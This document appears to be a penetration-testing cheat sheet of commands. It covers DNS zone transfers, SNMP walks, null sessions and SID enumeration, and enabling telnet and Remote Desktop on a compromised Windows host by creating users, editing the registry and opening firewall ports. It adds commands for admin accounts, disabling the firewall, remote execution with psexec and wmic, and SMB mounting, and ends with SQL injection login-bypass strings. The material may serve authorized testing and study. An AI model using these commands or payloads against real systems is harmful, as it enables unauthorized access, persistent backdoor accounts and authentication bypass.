Knowledge Base
sTunnel // Proxytunnel
Use OpenSSL like Netcat:
openssl s_client -connect www.example.com:443
BATCH FILES TO RUN COMMANDS
NSlookup command line:
nslookup -"set type=[option]" [DOMAIN]
Zone Transfers:
host -l [DOMAINNAME] [DNS-SERVER]
host -l goldcup.com ns.goldcup.com <-- example
SNMP Walk:
snmpwalk -c [STRING] -v[version] [TARGET IP]
Set Null session: net use \\[TARGET IP] "" /u:""
Find SID:
user2sid.exe \\[TARGET IP] [TARGET COMPUTER NAME]
user2sid.exe \\[TARGET IP] [USER NAME]
Enumeration loop:
for /L %i in (1000,1,1010) do @sid2user \\[TARGET IP] 5 [TARGET SID ] %i
Service is Dead alert:
while `nc -vv -z -w3 127.0.0.1 25 > /dev/null` ; do echo "Service is ok"; sleep 1; done; echo "Service is dead"; while (true); do echo -e "\x07"; done
Updating Metasploit:
svn update
Active telnet through shell (WINDOWS):
Check current status:
sc query tlntsvr
Change startup type to automatic:
sc config tlntsvr start=auto
Turn service on:
sc start tlntsvr
Add new user:
net user [USERNAME] [PASS] /add
Add to localgroup:
net localgroup TelnetClients [USERNAME] /add
Configure firewall to open single port:
netsh firewall add portopening protocol = TCP port = 23 name=telnet mode=enable scope=custom address=[youIPAddress]
Active Remote Desktop through shell (WINDOWS):
Check current status:
sc query termservice
Change startup type to automatic:
sc config termservice start=auto
Turn service on:
sc start termservice
Change Registry to allow connection:
reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0
Add new user: [SAME AS ABOVE]
Add to user group:
net localgroup "Remote Desktop Users" [USERNAME] /add
Configure Firewall to open single port:
netsh firewall set service type=remotedesktop mode=enable scope=custom address=[YourIPAddress]
WINDOWS COMMANDS
Adding users:
net user [USERNAME] [PASS] /add
Add to local admin group:
net localgroup administrators [USERNAME] /add
Remove user from a group:
net localgroup [GROUP] [USERNAME] /del
Delete an account:
net user [USERNAME] /del
Delete firewall rules:
netsh firewall del portopening protocol=[TCP/UDP] port=[PORT_NUMBER]
Disable firewall altogether:
netsh firewall set opmode disable
Set up a session with a target:
net use \\[IP] [PASSWORD] /u:[USERNAME]
Mount a share:
net use * \\[IP]\[SHARE]$ [PASSWD] /u:[USERNAME]
some machines require computer name before user: /u:[HOSTNAME]\[user]
Remove session:
net use \\[IP] /del
Remove all sessions:
net use * /del
EXECUTE COMMANDS ON TARGET MACHINE:
PSEXEC:
psexec \\[TARGET] -d -u [USER] -p [PASSWORD] [COMMAND]
WMIC: (on by default)
Run Program on Target Immediately:
wmic /node:[TARGET] /user:[ADMIN-USR] /password:[PASSWORD] process call create [COMMAND]
List Processes on Target:
wmic /node:[TARGET] /user:[ADMIN-USR] /password:[PASSWORD] process list brief
Kill Process on Target by PID:
wmic /node:[TARGET] /user:[ADMIN-USR] /password:[PASSWORD] process where processid="[PID]" delete
Kill Process on Target by name:
wmic /node:[TARGET] /user:[ADMIN-USR] /password:[PASSWORD] process where name="[NAME]" delete
USING SAMBA:
smbclient //[TARGET]/c$ [password] /u:[username] #Works like FTP for SMB (ls,GET, PUT, ...)
smbclient -L [IP/HOSTNAME] #Lists the shares avaiable on the host
smbmount //[TARGET]/[SHARE] /mnt/[MOUNT-POINT] ## Mount Share
## Mount the share with user/pass ##
smbmount //[TARGET]/[SHARE] /mnt/[MOUNT-POINT] -o username=[USER],password=[PASS], rw
umount /mnt/[MOUNT-POINT] # Remove mounted share
GUI: System >> Remote Places >> SAMBA Shares
SQL INJECTION:
-------------------------
Windows SQL injection (site contain /admin/login.asp or just login.asp page)
Instead of a password, use one of this string:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a